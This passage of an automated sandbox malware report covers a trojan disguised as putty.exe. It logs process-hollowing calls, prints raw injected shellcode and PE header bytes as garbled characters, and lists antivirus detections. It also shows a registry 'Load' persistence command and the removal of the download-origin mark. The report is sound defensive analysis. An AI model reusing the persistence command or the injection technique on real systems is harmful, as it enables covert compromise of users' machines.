WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: UìUEÈÒt ÆAêu÷]ÃUìd¡0ì@SVWxé§G03ö_,?EøB<}ôDxEðÀÁë3ÉÛt-}ø¾ÁÎ <aUø\| ÂÀàðëuøA;ËrßUü}ôEðL3ÛD ÂMìÉt<3ÿÊÀMøÑEè ÁÏ ¾ÁøBÉuñUü}øEø}ôÆ;Et EèC;]ìrÄWUüÒKÿÿÿ3À_^[ÉÂuðD$X·DÂëÝUìì¼ESVWXhLw&M ]¸èèþÿÿðÇEÄkern3ÀÇEÈel32EÐEÞEÄPÇEÌ.dllÇEàntdlÇEäl.dlfÇEèlÇEÔuserÇEØ32.dfÇEÜllfÇEø1fÇEü2ÿÖEàPÿÖEÔPÿÖhX¤SåèyþÿÿhyÌ?EèlþÿÿhEVEôè_þÿÿhDð5àEÀèRþÿÿhî¶PE¤èEþÿÿhÆREè8þÿÿh_xTîEðè+þÿÿhÚöÚOEèþÿÿøhÆp}´èþÿÿh_»ðèþÿÿh-W®[E¼èöýÿÿE¬3ÀPhjPPhSE¨ÿ×jEìPÿÖ]ø}°jh0WjÿÓðötîjE¨PW}ìVWÿU¼WÿUð>M]¸tjEøPPjÿUÀÆEhà.ÿU¤3À}«jDj«««DÿÿÿPèTýÿÿÄÿu jhÿÿÿUE¼ÀuOEPDÿÿÿP3ÀPPPPPPPSÿUôÀ¯PPjPPh@SE¸ÿU´øjÿÿtE¸ë^EüPPjÿUÀéeìMìQPÿU}ìtoEPDÿÿÿP3ÀPPPPPPPSÿUôÀuOPPjPPh@SEÿU´øjÿÿt*EPÿu°VWÿU¬WÿUðEPDÿÿÿP3ÀPPPPPPPSÿUôë EüPPjÿUÀÆEÿu¼ÿUð}åþÿÿ_^[ÉÃAd1ç@\|AAvý@ base_address: 0x007a0000 process_identifier: 1476 process_handle: 0x000001f0	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: ´C:\ProgramData\images.exeìñ$èèò$ò$P,¨v\|,¨v^ö½ó$5$igÿÿÿÿÿ,ò$ó$ú$à^ªv"xËþÿÿÿ\|,¨v 5¨vè base_address: 0x020a0000 process_identifier: 1476 process_handle: 0x000001f0	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000200	1	1	0
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 1204 process_handle: 0x00000200	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1868 called NtSetContextThread to modify thread in remote process 2840
Process injection	Process 1408 called NtSetContextThread to modify thread in remote process 1204
NtSetContextThread Aug. 3, 2021, 9:08 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4218408 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000204 process_identifier: 2840	1	0	0
NtSetContextThread Aug. 3, 2021, 9:08 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4218408 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000204 process_identifier: 1204	1	0	0

Putty Files, Registry Keys and/or Mutexes Detected

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\ProgramData\images.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1868 resumed a thread in remote process 2840
Process injection	Process 1408 resumed a thread in remote process 1204
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2840	1	0	0
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 1204	1	0	0

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Lionic	Trojan.Win32.Malicious.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Bulz.585360
FireEye	Generic.mg.0cfe251e0b61bbc8
ALYac	Trojan.PSW.AveMaria
CrowdStrike	win/malicious_confidence_100% (W)
Cyren	W32/MSIL_Kryptik.DMC.gen!Eldorado
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of MSIL/Kryptik.ACEV
APEX	Malicious
Paloalto	generic.ml
BitDefender	Gen:Variant.Bulz.585360
Ad-Aware	Gen:Variant.Bulz.585360
Emsisoft	Gen:Variant.Bulz.585360 (B)
McAfee-GW-Edition	BehavesLike.Win32.Fareit.bc
Sophos	Mal/Generic-S
Gridinsoft	Trojan.Win32.Packed.oa
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Noon.gen
GData	MSIL.Malware.Injector.XBI1FY
Cynet	Malicious (score: 100)
MAX	malware (ai score=81)
TrendMicro-HouseCall	TROJ_GEN.R06CH07H221
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.GIQ!tr
Qihoo-360	Win32/Heur.Generic.HwMAueAA

Executed a process and injected code into it, probably while unpacking (36 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 3, 2021, 9:07 a.m.	thread_handle: 0x000000d0 suspend_count: 1 process_identifier: 1868	1	0
NtResumeThread Aug. 3, 2021, 9:07 a.m.	thread_handle: 0x00000160 suspend_count: 1 process_identifier: 1868	1	0
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2092 thread_handle: 0x00000204 process_identifier: 2840 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\putty.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\putty.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000200	1	1
NtGetContextThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 2840 region_size: 1433600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000200	1	0
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x00401000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x00417000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x0041c000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x0055b000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: 2Aç¾d\|ÆáªøbcËÅ×fíT!¬$:íÖüCßG½ ë8æ·È7¶/ØH<T' o¦7ùök¬¶ÔáuÐÄé3!$¡Ö¤$ä_xål¨ÇÐ"k;vQ3øµÜfÂk\|ß´x¤G}Ç]}» àK êöU;2x hl»£f?5¶8×a´X@ú½GDÌ\|yû°¨`Te1(@B base_address: 0x0055d000 process_identifier: 2840 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2840 process_handle: 0x00000200	1	1
NtSetContextThread Aug. 3, 2021, 9:08 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4218408 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000204 process_identifier: 2840	1	0
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2840	1	0
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 1292 thread_handle: 0x000001f0 process_identifier: 560 current_directory: filepath: track: 1 command_line: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000001f8	1	1
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2220 thread_handle: 0x000001f0 process_identifier: 1408 current_directory: filepath: C:\ProgramData\images.exe track: 1 command_line: filepath_r: C:\ProgramData\images.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000001f8	1	1
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2480 thread_handle: 0x00000084 process_identifier: 2080 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\reg.exe track: 1 command_line: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x000000d0 suspend_count: 1 process_identifier: 1408	1	0
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x0000015c suspend_count: 1 process_identifier: 1408	1	0
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2356 thread_handle: 0x00000204 process_identifier: 1204 current_directory: filepath: C:\ProgramData\images.exe track: 1 command_line: filepath_r: C:\ProgramData\images.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000200	1	1
NtGetContextThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1204 region_size: 1433600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000200	1	0
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $n·ÇìäÇìäÇìäã_äÆìäÎäÆìäã]äÅìäàmäÆìäànäÄìäÂàäÆìäÎäÃìäÎäØìäÇìä5ìäT å°ìäTåÆìäRichÇìäPELrìE_àRP(^p@à@ª,°à0©p.textwPR `.rdata\|NpPV@@.dataÐíÀ¨¦@À.relocà°N@B.bssÐ`@@ base_address: 0x00400000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x00401000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x00417000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x0041c000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: base_address: 0x0055b000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: 2Aç¾d\|ÆáªøbcËÅ×fíT!¬$:íÖüCßG½ ë8æ·È7¶/ØH<T' o¦7ùök¬¶ÔáuÐÄé3!$¡Ö¤$ä_xål¨ÇÐ"k;vQ3øµÜfÂk\|ß´x¤G}Ç]}» àK êöU;2x hl»£f?5¶8×a´X@ú½GDÌ\|yû°¨`Te1(@B base_address: 0x0055d000 process_identifier: 1204 process_handle: 0x00000200	1	1
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1204 process_handle: 0x00000200	1	1
NtSetContextThread Aug. 3, 2021, 9:08 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4218408 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000204 process_identifier: 1204	1	0
NtResumeThread Aug. 3, 2021, 9:08 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 1204	1	0
CreateProcessInternalW Aug. 3, 2021, 9:08 a.m.	thread_identifier: 2044 thread_handle: 0x000001e8 process_identifier: 1476 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001e0	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1476 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001f0	1	0
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: UìUEÈÒt ÆAêu÷]ÃUìd¡0ì@SVWxé§G03ö_,?EøB<}ôDxEðÀÁë3ÉÛt-}ø¾ÁÎ <aUø\| ÂÀàðëuøA;ËrßUü}ôEðL3ÛD ÂMìÉt<3ÿÊÀMøÑEè ÁÏ ¾ÁøBÉuñUü}øEø}ôÆ;Et EèC;]ìrÄWUüÒKÿÿÿ3À_^[ÉÂuðD$X·DÂëÝUìì¼ESVWXhLw&M ]¸èèþÿÿðÇEÄkern3ÀÇEÈel32EÐEÞEÄPÇEÌ.dllÇEàntdlÇEäl.dlfÇEèlÇEÔuserÇEØ32.dfÇEÜllfÇEø1fÇEü2ÿÖEàPÿÖEÔPÿÖhX¤SåèyþÿÿhyÌ?EèlþÿÿhEVEôè_þÿÿhDð5àEÀèRþÿÿhî¶PE¤èEþÿÿhÆREè8þÿÿh_xTîEðè+þÿÿhÚöÚOEèþÿÿøhÆp}´èþÿÿh_»ðèþÿÿh-W®[E¼èöýÿÿE¬3ÀPhjPPhSE¨ÿ×jEìPÿÖ]ø}°jh0WjÿÓðötîjE¨PW}ìVWÿU¼WÿUð>M]¸tjEøPPjÿUÀÆEhà.ÿU¤3À}«jDj«««DÿÿÿPèTýÿÿÄÿu jhÿÿÿUE¼ÀuOEPDÿÿÿP3ÀPPPPPPPSÿUôÀ¯PPjPPh@SE¸ÿU´øjÿÿtE¸ë^EüPPjÿUÀéeìMìQPÿU}ìtoEPDÿÿÿP3ÀPPPPPPPSÿUôÀuOPPjPPh@SEÿU´øjÿÿt*EPÿu°VWÿU¬WÿUðEPDÿÿÿP3ÀPPPPPPPSÿUôë EüPPjÿUÀÆEÿu¼ÿUð}åþÿÿ_^[ÉÃAd1ç@\|AAvý@ base_address: 0x007a0000 process_identifier: 1476 process_handle: 0x000001f0	1	1
NtAllocateVirtualMemory Aug. 3, 2021, 9:08 a.m.	process_identifier: 1476 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x020a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001f0	1	0
WriteProcessMemory Aug. 3, 2021, 9:08 a.m.	buffer: ´C:\ProgramData\images.exeìñ$èèò$ò$P,¨v\|,¨v^ö½ó$5$igÿÿÿÿÿ,ò$ó$ú$à^ªv"xËþÿÿÿ\|,¨v 5¨vè base_address: 0x020a0000 process_identifier: 1476 process_handle: 0x000001f0	1	1

putty.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All